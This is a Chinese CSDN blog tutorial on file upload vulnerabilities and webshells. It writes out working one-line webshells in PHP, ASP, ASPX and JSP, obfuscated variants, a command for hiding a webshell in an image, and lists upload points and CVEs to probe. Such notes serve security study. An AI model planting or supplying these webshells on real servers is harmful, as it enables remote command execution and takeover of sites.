文件上传漏洞

文章详细解释了Webshell的概念,它是黑客用于控制网站服务器的后门工具,常见的一句话木马如ASP、PHP、JSP等。文件上传漏洞是Web应用普遍存在的安全问题,允许攻击者上传恶意脚本,可能导致服务器被控制。文章还列举了不同类型的Webshell和检测上传漏洞的方法。
摘要由CSDN通过智能技术生成

文件上传漏洞

什么是webshell

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.

黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。

种类:
一句话木马、小马、大马、打包马、脱库马、等等


一句话木马

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

asp一句话木马:<%eval request("c")%>
php一句话木马:<?php @eval($_POST[value]);?>
aspx一句话木马:<%@ Page Language="Jscript"%><%eval(Request.Item["value"])%>
jsp一句话:
<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>  

变形:
<?php $_REQUEST['a']($_REQUEST['b']); ?>
<%Eval(Request(chr(112)))%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("xindong"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%a=request("gold")%><%eval a%>


一句话木马的管理软件

一句话木马客户端:菜刀、蚁剑、冰蝎

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qhCjDpFL-1685509347342)(C:/Users/MiQiLin/AppData/Roaming/Typora/typora-user-images/image-20230526151852347.png)]


小马

概述

小马体积小,容易隐藏,隐蔽性强,最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传或者命令执行等功能。

大马

网站管理工具

用途:提权、打包、脱裤、增删文件


图片马

把webshell通过二进制的方式写入图片中,即不影响图片本身浏览,又能在图片被包含时解析,或者直接将后缀修改成asp/php时亦能解析。

•把下列这行代码写进1.php文件中

<?php @eval($_POST['cmd']);?>

•然后利用copy命令生成图片马

copy 1.jpg /b + 1.php 2.jpg


文件上传漏洞概述

WEB应用程序通常会有文件上传的功能

例如:在BBS发布图片、在个人网站发布ZIP压缩包、在招聘网站上发布DOC格式简历等。只要WEB应用程序允许上传文件,就有可能存在文件上传漏洞。在不对被上传的文件进行限制或者限制被绕过,该功能便有可能被利用于上传可执行文件、脚本到服务器上,从而进一步导致服务器沦陷。

如何确认WEB应用程序是否存在上传漏洞呢?

比如:一个BBS论坛,由PHP语言开发,用户可以上传个性头像,也就是图片文件,但文件上传时候并没有对图片格式做验证,导致用户可以上传任意文件,那么这就是一个上传漏洞,总之就是上传的文件被成功当做脚本解析,就代表有文件上传漏洞。


如何找到上传点

Web前台
暴露的编辑器URL
图片/头像上传
已知CMS漏洞
CLTPHP_v5.5.3任意文件上传漏洞
PHPCMS_v9.6.0任意文件上传漏洞

Web后台
集成的编辑器
文章发布
文件管理器
其它上传功能

Web中间件/服务器
“PUT”上传漏洞
Tomcat后台弱口令部署WAR包
Weblogic文件上传漏洞(如CVE-2018-2894)
工具
基于字典的扫描器
爬虫

文件管理器
其它上传功能

Web中间件/服务器
“PUT”上传漏洞
Tomcat后台弱口令部署WAR包
Weblogic文件上传漏洞(如CVE-2018-2894)
工具
基于字典的扫描器
爬虫


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值